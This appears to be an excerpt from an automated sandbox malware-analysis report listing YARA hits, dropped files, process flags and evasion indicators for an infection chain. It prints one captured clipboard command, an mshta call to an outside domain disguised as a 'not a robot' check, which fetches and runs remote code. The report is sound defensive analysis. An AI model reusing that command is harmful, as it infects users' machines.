            Source: Yara matchFile source: 00000017.00000002.2188352785.0000000005453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2188352785.000000000554E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2264964941.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2159638656.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://servverifcloud.com/ # I m not a robot: ludflare Vrifiction ID: 00-G
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeFile created: C:\Users\user\AppData\Local\Temp\sqxmjqhulqJump to dropped file
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeFile created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE263.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Inkberry\launchultra.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE263.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeFile created: C:\Users\user\AppData\Local\Temp\sqxmjqhulqJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\SQXMJQHULQ
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\SQXMJQHULQ
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeAPI/Special instruction interceptor: Address: 6C5690B4
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeAPI/Special instruction interceptor: Address: 6C2C3F54
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeAPI/Special instruction interceptor: Address: 6C568DB8
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 6C564B84
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 3000000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 38C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 3700000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 7440000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 8440000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 13F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 2EE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: 4EE0000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4991
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4670
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeWindow / User API: threadDelayed 4555
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeWindow / User API: threadDelayed 5235
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqxmjqhulqJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE263.tmpJump to dropped file
            Source: C:\Windows\System32\svchost.exe TID: 9000Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 4991 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 4670 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 4588Thread sleep count: 49 > 30
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 4588Thread sleep count: 141 > 30
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -26747778906878833s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -34428s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59888s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 5072Thread sleep count: 4555 > 30
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 5072Thread sleep count: 5235 > 30
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -59361s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59776s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59647s >= -30000s
